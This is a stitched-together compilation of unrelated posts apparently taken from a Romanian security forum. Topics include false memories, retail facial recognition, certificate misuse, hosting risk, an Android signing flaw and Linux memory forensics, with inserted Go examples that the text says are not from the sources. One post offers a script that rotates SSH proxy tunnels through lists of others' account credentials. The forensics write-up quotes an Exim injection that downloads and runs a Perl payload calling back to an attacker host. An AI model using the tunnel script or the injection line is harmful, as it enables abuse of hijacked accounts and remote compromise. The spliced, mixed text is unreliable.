"In humans, the phenomenon of false memories is very well known to researchers, and in some cases it has had serious legal consequences," explained researcher Susumu Tonegawa, a neuroscientist at MIT.

When the brain forms a memory, a population of brain cells undergoes lasting physical or chemical changes. Memory has two stages: first, the memory is created by activating these brain cells. Later, it is recalled by reactivating these cells. Scientists had hypothesized that these memory cells exist, but had never managed to demonstrate their presence.

Last year, Tonegawa and his colleagues showed that these cells exist in an area of the hippocampus, the brain's memory center. The researchers genetically modified mice to make certain neurons sensitive to light – a technique called optogenetics – so that they could activate these cells by exposing them to blue light.

The mice were placed in a chamber where they received foot shocks, making them "freeze" in fear. The animals learned to associate the shocks with that chamber, forming a fear memory. Later, the researchers placed the mice in a different chamber and exposed the cells encoding the fear memory to blue light. The animals reacted just as frightened as when they were in the first chamber.

In the most recent research, the group led by Tonegawa took the experiment a step further. First, the scientists let the mice explore the first chamber without receiving any foot shock. Then they placed the mice in another chamber, where they gave them foot shocks while exposing the cells encoding the memory of the first chamber to blue light.

The researchers wanted to find out whether, when the mice were put back in the first chamber, they would react as if they had been shocked inside it. The mice reacted exactly this way, showing fear when placed in the first chamber, even though they had never experienced a shock there. The researchers thus managed to implant a false memory in the minds of the mice. The results of the study are detailed in the journal Science.

"Memories are produced by experience," Tonegawa said. Yet in this case the animal had not experienced a moment of fear in the first chamber, but it was afraid of that chamber, the scientist explains.

The study's results offer a model that explains how false memories can form in humans. Before science devised DNA testing, many offenders were convicted on the basis of witness statements. Later, when their DNA was tested, "three quarters of the people sentenced to long prison terms on the basis of witness statements turned out to be innocent," Tonegawa explains.

The researcher gives a famous example of a woman who was watching a TV show when a man broke into her apartment and raped her. The man the woman accused of the rape was a famous psychiatrist who was a guest on a television show at the time the woman was raped. The psychiatrist was in a TV studio at the time of the rape, so he could not have been the rapist, yet the woman swore he was the culprit, because she had formed a false memory associating the sound of the man's voice with the rape.

"As with our mice, the false memory was stronger," Tonegawa explained.

How did humans come to have the ability to form false memories? Tonegawa speculates that this is the price humans pay for creativity. Imagination makes us inventive, but it also makes us prone to mixing up events that did happen with ones that did not.

"People are very creative. As a side effect, we form false memories," the researcher concluded.

Source: Cercetătorii au reușit să implanteze amintiri false în creier și au înțeles de ce rememorăm evenimente ce nu au avut loc
  12. The script below automates PuTTY so that it changes the IP at an interval set by the user. It creates an SSH tunnel with one of the accounts found in the file nologine.txt; the account it connects to is chosen at random, and when the set time expires a new tunnel is created using another randomly chosen account, and so on. If it runs into problems using an account, it automatically moves on to choosing another one. The script runs until it is closed from Task Manager.

To be usable, the following must exist in the same directory as the script below:

putty.exe  PuTTY Download Page
nologine.txt

nologine.txt contains the ssh (nologin) accounts, one per line:

ip1:user1:password1
ip2:user2:password2

script:

#Python 2.7.*
#Copyright Rstforums.com
import random
import time
import subprocess
import datetime

#################config#################
port = "1080"
exchangetime = "120"  # in seconds
sshlist = "nologine.txt"
########################################

# load the accounts: one "ip:user:password" triple per line
accounts = {}
i = 1
for line in open(sshlist, "r"):
    line = line.rstrip()
    if not line:
        continue  # skip blank lines instead of crashing on them
    accounts[i] = line.split(":")
    i = i + 1

while True:
    now = datetime.datetime.now()
    # pick a random account for the next tunnel
    aleator = random.randint(1, len(accounts))
    date = accounts[aleator]
    ip = date[0]
    username = date[1]
    password = date[2]
    command = "putty.exe -D " + str(port) + " -l " + str(username) + " -pw " + str(password) + " -ssh " + str(ip)
    print str(now.year) + "." + str(now.month) + "." + str(now.day) + " " + str(now.hour) + ":" + str(now.minute) + " -->" + str(ip)
    try:
        puttyproc = subprocess.Popen(command)
        time.sleep(int(exchangetime))
        puttyproc.terminate()
    except Exception:
        pass  # on any error with this account, move on to another one

#####
#End.
#####
  13. PHP Course Part I: Introduction
PHP Course Part II: Displaying Information and Variables
PHP Course Part III: IF Statements
PHP Course Part IV: Loops and Arrays
PHP Course Part V: E-mail with PHP
PHP Course Part VI: PHP with Forms
PHP Course Part VII: Final Remarks
Math Operations
Find Host from NET
Find IP
  14. Stores are already testing facial recognition technology, used to identify celebrities who walk through retailers' doors.

It works by analyzing video footage, from which only people's faces are extracted. The program then takes a number of measurements to create a numeric code, known as a "facial template", and runs it through a database containing the faces of celebrities or valuable customers, according to the Sunday Times, cited by NPR.

If a face is found in the database, the program sends an alert message to store employees via computer, iPad or smartphone, providing details such as clothing size, favorite purchases or the person's purchase history. The program works even if customers wear sunglasses, hats or scarves. Recent tests have shown that facial hair, aging, or changes in weight or hair color do not affect the accuracy of the identification system.

The new technology is currently being tested in 12 stores and hotels, whose names and locations are kept secret, in America, the United Kingdom and the Far East. The British company NEC IT Solutions uses similar technology for security firms, which use it, in this case, to identify terrorists and criminals.

Privacy violation?

Manolo Almagro, vice president of digital at the retail agency TPN Inc., says the technology is not new, merely a more sophisticated version of Google Images, which lets users find photos similar to other images. But, he says, facial recognition treads on dangerous territory: Google had to drop the facial recognition program from Google Glass because of privacy concerns.

When clothing retailer Nordstrom revealed that it was tracking customers through their phones' Wi-Fi signal, the chain was pilloried and had to stop the practice. Retailers are juggling concerns about violating customers' privacy with the desire to increase revenue through analytical marketing.

Chris de Silva, vice president of IT solutions at NEC, says he has encountered privacy concerns, but has found that most important customers are "actually happy to make their information available, because they want faster, personalized service".

Technology too expensive

Even so, Manolo Almagro argues that the service will not become a global one, especially since it is expensive. "There are many other alternative methods, more efficient ones, such as the mobile phone, which can be used to obtain information," he said. Retailers such as Family Dollar, Benetton and Warby Parker already take customers' personal data from smartphones to personalize services, noting that the situation is similar to what happens online. But Almagro considers what retailers do with the collected data to be worrying.

Source: Spionul din magazine: Recunoasterea faciala, noua ''arma'' a comerciantilor
Article in English: High-End Stores Use Facial Recognition Tools To Spot VIPs : All Tech Considered : NPR
  15. 1. Visit this PAGE and click on the big orange “Sign Up For Free” button. Follow the instructions to create your new account.
2. Next, verify your AT&T Access ID. You will be sent an email with verification instructions. Please follow the link in the email to verify your AT&T Access ID. Note: if you do not receive the email within 5 minutes, please check your spam folder.
3. With that done, click the Accounting Settings link (in your Locker), then click “My Plan”, followed by “Upgrade Plan”. Choose the Free 50GB option (Limited Time Offer) and take it from there.
4. Check My Plan again and you will find you’ve got 50GB of cloud storage for free, no strings attached.

Source
  16. Like many of you, I have been watching the development of memory forensics over the last two years with a sense of awe. It is amazing how far the field has come since the day Chris Betz, George Garner and Robert-Jan Moral won the 2005 DFRWS forensics challenge. Of course, similar to other forensic niches, the majority of progress has been made on Windows memory forensics. There is good reason for this. Memory can be extremely fickle, with layouts and structures changing on a whim. As an example, the symbols file for Windows 7 SP1 x86 is 330MB, largely due to it needing to support major changes that can occur in every service pack and patch. The fact that we have free tools such as Volatile Systems Volatility and Mandiant Redline supporting memory images of arbitrary size from (nearly) every modern version of Windows is nothing short of miraculous.

Nowhere is it more obvious how far the memory analysis field has come than looking at the recent innovations in Mac and Linux memory forensics. Examiners of these less popular platforms have had to sit patiently for years as Windows memory forensics moved from being feasible for OS internals experts to being approachable for the masses. Against all odds, Linux memory analysis has recently seen rapid innovations. If support for the various Windows versions came slowly, imagine the complexity posed by the myriad flavors of Linux and the long list of possible kernel versions. It turns out that the Volatility framework is particularly well suited to tackle this Hydra with its abstraction layers facilitating everything from different image formats to swappable OS profiles to rapid plugin development.

Getting Started – SVN Checkout

I recommend upgrading to (at least) version 2.3 of Volatility when getting familiar with Linux memory. The 2.3 plugins are still in beta, but there have been some significant improvements that greatly facilitate analysis. Adding the latest version is easy via subversion checkout. For instance, in the SANS SIFT workstation, you can run the following commands:

mkdir /usr/local/src/vol2.3
svn checkout http://volatility.googlecode.com/svn/trunk /usr/local/src/vol2.3/
chmod 755 /usr/local/src/vol2.3/vol.py
ln -s /usr/local/src/vol2.3/vol.py /usr/local/bin/voldev.py
voldev.py --info

Creating a profile

The only significant hurdle to performing Linux memory analysis in Volatility is the requirement to create a bespoke profile for the flavor of Linux with which you are working. Creating a profile is surprisingly easy — a great testament to the flexibility of the framework. If you work in a pseudo-homogeneous environment you may only need to pre-build a few profiles to cover the systems you are likely to encounter. If you don’t have the luxury of pre-building profiles, the steps can easily be scripted and included in your incident response scripts (run after memory acquisition and substituting the Subversion checkout of Volatility with just the files necessary to run the “make” command). The Volatility wiki does an excellent job of describing the profile creation process, and the default Volatility SVN checkout contains the tools you need.

In my case, I was interested in working with an older version of Debian because I wanted to redo Challenge 7 of the Honeynet Project Forensic Challenge 2011. While 2011 isn’t that long ago, it might as well be ancient times for fast moving Linux distributions. Getting a running copy of the Debian 5 (Lenny) distribution took a few extra steps than would ordinarily have been required of a more modern distribution. Here was my process:

1. Download the correct distribution, being mindful of kernel version and architecture
   - Run "uname -a" or read the dmesg log on a live system. If you only have a memory image, strings can identify the correct distribution and kernel version.
   - The system type for the Honeynet challenge was Debian 5, 2.6.26 kernel, x86
2. Install the distribution into a virtual machine (VM)
   - Due to the age of the distribution, the default update mirrors were no longer supported. This required modifying /etc/apt/sources.list to point to the archive servers at Index of /
   - The repository misalignment resulted in a very minimal Linux install. With apt now pointing to the correct archive, I ran apt-get update and apt-get install debian-archive-keyring to include some of the basic packages
   - Watch for attempts by the distribution to auto-upgrade (and do not run apt-get upgrade)
3. Install Subversion in the VM and download Volatility
   apt-get install subversion-tools
   svn checkout http://volatility.googlecode.com/svn/trunk /usr/local/src/volatility/
4. Create the kernel data structures file using dwarfdump
   - My minimal installation required several additional packages:
   apt-get install make
   apt-get install linux-headers-$(uname -r)
   apt-get install dwarfdump
   cd /usr/local/src/volatility/tools/linux
   make
5. Locate the kernel symbol file
   - In this case the full path was /boot/System.map-2.6.26-2-686
6. Zip up your results and move to your forensic workstation
   - The final result should be a module.dwarf file and a “System.map” symbol file located within a zip archive. This zip archive must be copied to the overlays/linux folder within the Volatility distribution you intend to use. The --info command will display all recognized profiles.

Starting the Analysis

I found the 2011 Honeynet Challenge interesting because the winner, Dev Anand, and several others successfully used early versions of Linux memory analysis to help solve it. I was interested in gauging how far the state of the art had progressed since then. Simply put, the Volatility project has truly taken Linux analysis to the next level, with 40 plugins in version 2.3 providing vast capabilities that simply did not previously exist. Many of the questions that previously required access to the system disk can now be answered just as easily from the memory image. I’ll use the challenge to demonstrate some of the plugins.

linux_netstat

Processes and network connections are the first things I review when starting analysis of a new memory image. In this case the linux_netstat plugin identifies two interesting established connections to IP address 192.168.56.1 using ports 4444 and 8888. The connections are tied to processes named “sh” and “nc”. Further, we see a couple of interesting listening daemons: sshd on port 22 and exim4 on port 25.

linux_psaux

The linux_psaux plugin augments the standard process listing with command line information. While not terribly helpful here, the output does tend to reinforce that “nc” may in fact be a netcat binary.

NOTE: You only need to set the VOLATILITY_PROFILE environment variable once, but it is included in each of the examples as a reminder that the demonstrated plugins require a Linux profile value set or included via the --profile parameter.

linux_yarascan

The Volatility yarascan plugins for Windows, Mac, and now Linux leverage open-source yara signatures to provide a simple and powerful means to search user and kernel memory. In this example I was simply looking for the suspicious IP address string from the linux_netstat command, but keep in mind that an entire rules file could have been used. The first hit (found within process rsyslogd) could be a partial log entry related to a SSH login, which should be possible to verify within the /var/log/auth.log. This log could be found and exported using the linux_find_file Volatility plugin, but, in this case, it does not appear to be resident in memory. A review of the auth.log on disk shows several related failed logins from 192.168.56.1 via SSH:

Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from 192.168.56.1 port 44616 ssh2

The second and third yarascan hits displayed look like commands or related output. Since the hits were found in the bash process (PID 2042), the bash command line history would be worth reviewing.

linux_bash

The linux_bash plugin is a particularly impressive plugin as it carves out individual bash history entries and reassembles them for analysis. If bash history exists, it can provide a very in-depth view into user activity. In this case we see a lot of strange activity surrounding the exim server as well as attempts to copy the entire sda drive, sda1 partition and memory over to the suspicious IP addresses. A challenge in this investigation would be differentiating legitimate system administration actions from hacker activity. Given the manipulations surrounding exim, a logical next step might be to review the exim logs in /var/log/exim4. The /var/log/exim4/mainlog recorded several errors referencing the previously discovered suspicious IP address and ports as well as multiple wget attempts to download files into the /tmp folder:

2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <root@local.com>: failed to expand ACL string “pl 192.168.56.1 4444; sleep 1000000?”}} ${run{/bin/sh -c “exec /bin/sh -c ‘wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000?”}} …

linux_dentry_cache

To improve file system performance, Linux caches directory entries and inode information as files are opened. The linux_dentry_cache Volatility plugin returns the contents of the directory entry cache, giving examiners a detailed view of the most recently referenced files in the file system. In this case, I used the plugin in an attempt to identify whether the attacker succeeded in downloading tools to the /tmp directory. It appears that the attacker was eventually successful in retrieving the c.pl file. Further, the rk.tar archive looks interesting and should be analyzed.

Conclusion

Linux memory forensics has definitely come of age, and I highly recommend including it in your incident response process. Volatility makes it easy to get started. You can find the memory image demonstrated here at the Honeynet Project and download the Debian profile created for this post here. When you are done working with that image, Raytheon SecondLook provides a large selection of both clean and infected memory images. Finally, as you create new Linux profiles, please consider donating them back to the Volatility Linux profiles page (details are still pending on how the Volatility crew will manage this process).

Source: Getting Started with Linux Memory Forensics | Forensic Methods
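The pivot the post performs by hand (netstat address, then auth.log failures, then the Exim mainlog rejection with a ${run{...}} expansion) as an added Go example that is not part of the Forensic Methods post or of Volatility: it parses the two log formats, extracts every address each line mentions and marks events that share an address with the netstat output. The sample log lines are constructed here after the ones quoted in the post, with the command inside the ACL string elided.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is one indicator extracted from a log line.
type Event struct {
	Source     string   // "sshd" or "exim"
	Kind       string   // "failed-login" or "expansion-attempt"
	IPs        []string // every IPv4 address the line mentions, remote host first
	Detail     string
	Correlated bool // set when an IP also appears in the linux_netstat output
}

var (
	ipRe      = regexp.MustCompile(`\b\d{1,3}(?:\.\d{1,3}){3}\b`)
	sshFailRe = regexp.MustCompile(`sshd\[\d+\]: Failed (\S+) for (?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3}) port (\d+)`)
	eximRe    = regexp.MustCompile(`^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} H=\(([^)]*)\) \[(\d{1,3}(?:\.\d{1,3}){3})\] (.*)$`)
)

// ParseAuthLine recognises a failed SSH login in /var/log/auth.log.
func ParseAuthLine(line string) (Event, bool) {
	m := sshFailRe.FindStringSubmatch(line)
	if m == nil {
		return Event{}, false
	}
	return Event{
		Source: "sshd", Kind: "failed-login", IPs: []string{m[3]},
		Detail: fmt.Sprintf("auth=%s user=%s port=%s", m[1], m[2], m[4]),
	}, true
}

// ParseEximLine recognises an Exim mainlog rejection whose ACL string carries a
// ${run{...}} expansion, the pattern the post found, and collects every address
// mentioned in it (the connecting host plus anything embedded in the string).
func ParseEximLine(line string) (Event, bool) {
	m := eximRe.FindStringSubmatch(line)
	if m == nil || !strings.Contains(m[3], "${run{") {
		return Event{}, false
	}
	ips := []string{m[2]}
	seen := map[string]bool{m[2]: true}
	for _, ip := range ipRe.FindAllString(m[3], -1) {
		if !seen[ip] {
			seen[ip] = true
			ips = append(ips, ip)
		}
	}
	return Event{Source: "exim", Kind: "expansion-attempt", IPs: ips, Detail: "HELO=" + m[1]}, true
}

// Triage runs both parsers and flags events sharing an address with the
// established connections linux_netstat reported.
func Triage(authLines, eximLines, netstatIPs []string) []Event {
	known := map[string]bool{}
	for _, ip := range netstatIPs {
		known[ip] = true
	}
	var events []Event
	for _, l := range authLines {
		if e, ok := ParseAuthLine(l); ok {
			events = append(events, e)
		}
	}
	for _, l := range eximLines {
		if e, ok := ParseEximLine(l); ok {
			events = append(events, e)
		}
	}
	for i := range events {
		for _, ip := range events[i].IPs {
			if known[ip] {
				events[i].Correlated = true
			}
		}
	}
	return events
}

// Constructed sample input, modelled on the lines quoted in the post.
var (
	NetstatIPs = []string{"192.168.56.1"}
	AuthLines  = []string{
		"Feb  6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from 192.168.56.1 port 44616 ssh2",
		"Feb  6 15:20:58 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2",
		"Feb  6 15:22:01 victoria sshd[2170]: Accepted publickey for backup from 10.0.0.5 port 50122 ssh2",
	}
	EximLines = []string{
		`2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <root@local.com>: failed to expand ACL string "...${run{/bin/sh -c "... 192.168.56.1 4444 ..."}}"`,
		`2011-02-06 15:09:30 H=(mail.example.net) [10.0.0.9] temporarily rejected MAIL <a@example.net>: ratelimit exceeded`,
	}
)

func main() {
	for _, e := range Triage(AuthLines, EximLines, NetstatIPs) {
		fmt.Printf("%-5s %-18s correlated=%-5t ips=%v %s\n", e.Source, e.Kind, e.Correlated, e.IPs, e.Detail)
	}
}
```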
  17. Online communication and data sharing practices rely heavily on digital certificates to encrypt data as well as authenticate systems and people. There have been many discussions about the cracks starting to develop in the certificate-based Public Key Infrastructure (PKI) on the web. Let’s consider how the certs are typically used and misused to prepare for exploring ways in which the certificate ecosystem can be strengthened.

How Digital Certificates are Used

Digital certificates are integral to cryptographic systems that are based on public/private key pairs, usually in the context of a PKI scheme. Wikipedia explains that a certificate binds a public key to an identity. Microsoft details the role that a Certificate Authority (CA) plays in a PKI scenario:

"The certification authority validates your information and then issues your digital certificate. The digital certificate contains information about who the certificate was issued to, as well as the certifying authority that issued it. Additionally, some certifying authorities may themselves be certified by a hierarchy of one or more certifying authorities, and this information is also part of the certificate."

HTTPS communications are safeguarded by SSL/TLS certificates, which help authenticate the server and sometimes the client, as well as encrypt the traffic exchanged between them. Digital certificates also play a critical role in signing software, which helps determine the source and authenticity of the program when deciding whether to trust it. Certificates could also be used as the basis for securing VPN and Wi-Fi connections.

Misusing Digital Certificates

In recent years, the PKI environment within which digital certificates are created, maintained and used began showing its weaknesses. We’ve witnessed several ways in which the certs have been misused in attacks on individuals, enterprises and government organizations:

Stolen code-signing certificates and the associated private keys were used to sign malicious software. For instance, a breach at the security firm Bit9 allowed attackers to steal one of the company’s certs and use it to distribute malware. An apparently-stolen cert was used to sign a malicious Java applet. An attack on the browser company Opera allowed the intruder to access a code-signing cert and use it to sign malware. Code-signing certs stolen from Adobe were used to sign malicious software. It’s not uncommon for malware to be programmed to capture victims’ code-signing and other certificates, which will ensure that we’ll see more incidents of stolen certificates being misused.

CAs issued weak or improper certificates, which were later used in attacks. For example, DigiCert mistakenly sold a certificate to a company that didn’t actually exist; the cert was used to sign a malicious executable. Another CA named Digicert Sdn (no relation to DigiCert), issued certs with weak “512-bit RSA keys and missing certificate extensions," according to its parent company Entrust. Later, two of the certs "were used to sign malware used in a spear phishing attack against another Asian certificate authority." In another blunder, a CA named TURKTRUST mistakenly issued certs that have led to the impersonation of Google’s servers.

Man-in-the-middle (MITM) attacks abused certificates to intercept SSL/TLS traffic. Software rarely complains when a server’s SSL/TLS certificate has been signed by a trusted, but unexpected CA. For example, one person noticed that when connecting to Gmail via IMAP/SSL from a hotel, the server’s certificate was signed by an entity other than Google. A similar technique was allegedly used by Nokia, presumably for legitimate purposes, to decrypt phones’ HTTPS activities. There are probably many MITM instances where the traffic was captured illegitimately; unfortunately, such situations are often hard to detect.

Malware installed illegitimate certificates, configuring infected systems to trust them. For instance, a malicious Browser Helper Object (BHO) installed a fake Verisign cert as a Trusted Root Certificate Authority after infecting the system to eliminate security warnings. In another example, spyware acted as a local proxy for SSL/TLS traffic and installed a rogue certificate to conceal this behavior. Installing a fake root CA certificate on the compromised system can also assist with phishing scams, because they allow the attacker to set up a fake domain that uses SSL/TLS and passes certificate validation steps.

These were just some examples of real-world incidents where digital certificates were misused. In a follow-up post, we’ll look at the initiatives aimed at strengthening the ecosystem within which the certificates are issued, validated and utilized. Stay tuned.

Source: How Digital Certificates Are Used and Misused
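The MITM point above, that a certificate from a trusted but unexpected CA passes ordinary validation, shown in an added Go example that is not part of the original post: two root CAs are both trusted, a server certificate is issued from each for the same hostname, and only a pinned-issuer check tells them apart. The CA names, the hostname imap.example.com and the generated keys are constructed for this example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

var serial int64

// newCert issues a certificate for a fresh P-256 key. With parent == nil the
// certificate is self-signed (a root CA); otherwise parent/parentKey sign it.
func newCert(cn string, isCA bool, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	serial++
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		KeyUsage:              x509.KeyUsageDigitalSignature,
		BasicConstraintsValid: true,
		IsCA:                  isCA,
	}
	if isCA {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}
		tmpl.DNSNames = []string{cn}
	}
	signer, signerKey := tmpl, key
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert, key
}

// SPKIPin is the SHA-256 of the SubjectPublicKeyInfo, the usual pinning format.
func SPKIPin(c *x509.Certificate) string {
	sum := sha256.Sum256(c.RawSubjectPublicKeyInfo)
	return hex.EncodeToString(sum[:])
}

// VerifyPinned performs ordinary chain validation against roots and then also
// requires some CA in the resulting chain to match a pinned SPKI hash, so a
// certificate from a trusted but unexpected CA is rejected.
func VerifyPinned(leaf *x509.Certificate, host string, roots *x509.CertPool, pins map[string]bool) error {
	chains, err := leaf.Verify(x509.VerifyOptions{DNSName: host, Roots: roots})
	if err != nil {
		return err
	}
	for _, chain := range chains {
		for _, ca := range chain[1:] {
			if pins[SPKIPin(ca)] {
				return nil
			}
		}
	}
	return fmt.Errorf("%s: chain validates but no CA matches the pinned set", host)
}

// Result holds the outcome of each check in the scenario (nil means accepted).
type Result struct {
	Expected        error // expected CA, pinned check
	UnexpectedPlain error // other trusted CA, plain Verify only
	Unexpected      error // other trusted CA, pinned check
}

// RunScenario: two trusted roots, one leaf from each, plain validation vs pinning.
func RunScenario() Result {
	const host = "imap.example.com" // hypothetical hostname
	goodCA, goodKey := newCert("Expected Root CA", true, nil, nil)
	otherCA, otherKey := newCert("Other Trusted Root CA", true, nil, nil)
	roots := x509.NewCertPool()
	roots.AddCert(goodCA)
	roots.AddCert(otherCA)
	pins := map[string]bool{SPKIPin(goodCA): true}
	legit, _ := newCert(host, false, goodCA, goodKey)
	intercept, _ := newCert(host, false, otherCA, otherKey)
	_, plainErr := intercept.Verify(x509.VerifyOptions{DNSName: host, Roots: roots})
	return Result{
		Expected:        VerifyPinned(legit, host, roots, pins),
		UnexpectedPlain: plainErr,
		Unexpected:      VerifyPinned(intercept, host, roots, pins),
	}
}

func main() {
	r := RunScenario()
	fmt.Println("expected CA, pinned:   ", r.Expected)
	fmt.Println("other CA, plain Verify:", r.UnexpectedPlain)
	fmt.Println("other CA, pinned:      ", r.Unexpected)
}
```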
  18. Most of us host part or maybe even all of our infrastructure at hosting providers. They provide you with floor space, rack space, or in cloud environments with platforms and software for you to use. As with all of these solutions there are pros and cons to having your hardware hosted. In cloud environments the hardware and often software typically belongs to the provider and only the data belongs to you. What could go wrong?

As security professionals we get to discuss the risks of these kinds of arrangements and most of us will raise the risk of the provider going south or the data being unavailable for other reasons. The answer we often get is along the lines of “oh that never happens and we have backups”. Unfortunately that doesn’t always help and losing data isn’t the only issue, as has been aptly demonstrated this week when a number of datacentres in Belgium and the Netherlands closed up shop.

Belgische tak Datahouse is failliet verklaard - IT Pro - Nieuws - Tweakers
Datahouse Belgium failliet verklaard - Nieuws - Datanews.be - Datanews.be
Datahouse Belgium failliet verklaard op verzoek van Scarlet Business | ISPam.nl
Datahouse belgië failliet. is datahouse nl de volgende? | intall.nl

In a nutshell the provider was declared bankrupt, the doors closed and connections were cut. As the articles state customers were denied access to their servers whilst the bankruptcy processes were established. In a number of cases connectivity to servers was cut, denying access to the data. So what risks are there when a hosting provider goes bust?

Denied access to physical servers – In many hosting situations the line between who owns what is difficult and often physical access will be denied until ownership can be demonstrated. In the meantime you may have expensive equipment sitting in a datacentre that you can no longer access.

Denied access to data (internet) – This can happen a number of ways. The Internet connection may be removed which obviously cuts your and anyone else’s access. Sometimes machines are shut down. Whilst many administrators may decide to keep things running, after all earning some money is better than none, to cut cost supporting services may be reduced and if something breaks it is unlikely to get fixed.

Denied access to data (local) – You may decide to go pick up your data, but getting access may not be that easy. So unless you can retrieve it remotely you may have to kiss that goodbye.

Backups – Any backups taken by the hosting provider are unlikely to be accessible. Depending on the systems used to manage backups it may be quite a task to get them. Even if you get the physical tapes (if used) you are unlikely to get the backup catalogue, so retrieving data will be difficult.

Disclosure of data – Physical access usually trumps most of the controls many of us place on our hosted environment and in the cloud we do not have any control. So it is quite likely that you will not be able to deny access of third parties to your data.

Least of all you will be left with the cost of moving operations to an alternate location and as most of us who have been involved with datacentre moves know that is not a trivial task.

It would be mean to just leave it there, so what can be done about this to mitigate the risks?

Denied access – If denied access to your servers or data a DR environment is probably your best bet. Being able to run up services elsewhere provides processing capabilities whilst lawyers sort out getting physical assets back. However tempting it may be it is probably not a great idea to have the production environment and your DR environment hosted by the same organisation.

Backups – Make your own. Do not rely on the hosting provider to do all the backups. Alternatively make sure that backups are stored elsewhere, including the catalogue so you can readily identify the data on the tapes, if needed.

Disclosure of data – This is probably the most difficult one and makes you wish that the Mission Impossible slogan (this message will self-destruct in …) were an actuality. Not many of us are in the habit of full disk encryption on servers, but that may be the only way, and it won’t help in a PaaS or SaaS situation.

Source: Internet Storm Center Diary 2013-07-20
  19. Quite a lot of suggestions in the last few days...

1. this is a forum for people passionate about IT security; the fact that some users make a few $ from clicks is OK, but the forum must not be turned into a click-exchange stall
2. if someone has an "invitation code for Dropbox, VPN," etc. and posts it (in the correct category, e.g. progr sec/links/tools/etc.), I don't think they will be sanctioned as long as they show a minimum of common sense:
referral link: (if you click here you give me 1GB)
direct link:
3. if someone still wants to help the community and doesn't know how, a few examples to follow:
https://rstforums.com/forum/65916-tutorial-python-3-2-a.rst
https://rstforums.com/forum/61374-cum-dezvolti-un-exploit-01-a.rst
https://rstforums.com/forum/71542-rst-index-alternative.rst
  20. Vulnerability allows attackers to modify Android apps without breaking their signatures
The vulnerability affects 99 percent of Android devices and has existed since Android 1.6, researchers from security firm Bluebox said
A vulnerability that has existed in Android for the past four years can allow hackers to modify any legitimate and digitally signed application in order to transform it into a Trojan program that can be used to steal data or take control of the OS.
Researchers from San Francisco mobile security startup firm Bluebox Security found the flaw and plan to present it in greater detail at the Black Hat USA security conference in Las Vegas later this month.
The vulnerability stems from discrepancies in how Android apps are cryptographically verified, allowing an attacker to modify application packages (APKs) without breaking their cryptographic signatures.
When an application is installed and a sandbox is created for it, Android records the application's digital signature, said Bluebox Chief Technology Officer Jeff Forristal. All subsequent updates for that application need to match its signature in order to verify that they came from the same author, he said.
This is important for the Android security model because it ensures that sensitive data stored by one application in its sandbox can only be accessed by new versions of that application that are signed with the original author's key.
The vulnerability identified by the Bluebox researchers effectively allows attackers to add malicious code to already signed APKs without breaking their signatures.
The vulnerability has existed since at least Android 1.6, code named Donut, which means that it potentially affects any Android device released during the last four years, the Bluebox researchers said Wednesday in a blog post. "Depending on the type of application, a hacker can exploit the vulnerability for anything from data theft to creation of a mobile botnet," they said.
The vulnerability can also be exploited to gain full system access if the attacker modifies and distributes an app originally developed by the device manufacturer that's signed with the platform key -- the key that manufacturers use to sign the device firmware.
"You can update system components if the update has the same signature as the platform," Forristal said. The malicious code would then gain access to everything -- all applications, data, accounts, passwords and networks. It would basically control the whole device, he said.
Attackers can use a variety of methods to distribute such Trojan apps, including sending them via email, uploading them to a third-party app store, hosting them on any website, copying them to the targeted devices via USB and more. Some of these methods, especially the one involving third-party app stores, are already being used to distribute Android malware.
Using Google Play to distribute apps that have been modified to exploit this flaw is not possible because Google updated the app store's application entry process in order to block apps that contain this problem, Forristal said. The information received by Bluebox from Google also suggests that no existing apps from the app store have this problem, he said.
However, if an attacker tricks a user to manually install a malicious update for an app originally installed through Google Play, the app will be replaced and the new version will no longer interact with the app store. That's the case for all applications or new versions of applications, malicious or non-malicious, that are not installed through Google Play, Forristal said.
Google was notified of the vulnerability in February and the company shared the information with their partners, including the members of the Open Handset Alliance, at the beginning of March, Forristal said. It is now up to those partners to decide what their update release plans will be, he said.
Forristal confirmed that one third party device, the Samsung Galaxy S4, already has the fix, which indicates that some device manufacturers have already started releasing patches. Google has not released patches for its Nexus devices yet, but the company is working on them, he said.
Google declined to comment on the matter and the Open Handset Alliance did not respond to a request for comment.
The availability of firmware updates for this issue will differ across device models, manufacturers and mobile carriers. Whether a combination of device manufacturers and carriers, which play an important role in the distribution of updates, coincide to believe that there is justification for a firmware update is extremely variable and depends on their business needs, Forristal said.
"Ideally it would be great if everyone, everywhere, would release an update for a security problem, but the practical reality is that it doesn't quite work that way," he said.
The slow distribution of patches in the Android ecosystem has long been criticized by both security researchers and Android users. Mobile security firm Duo Security estimated last September, based on statistics gathered through its X-Ray Android vulnerability assessment app, that more than half of Android devices are vulnerable to at least one of the known Android security flaws.
Judging by Android's patch distribution history so far, the vulnerability found by the Bluebox researchers will probably linger on many devices for a long time, especially since it likely affects a lot of models that have reached end-of-life and are no longer supported.
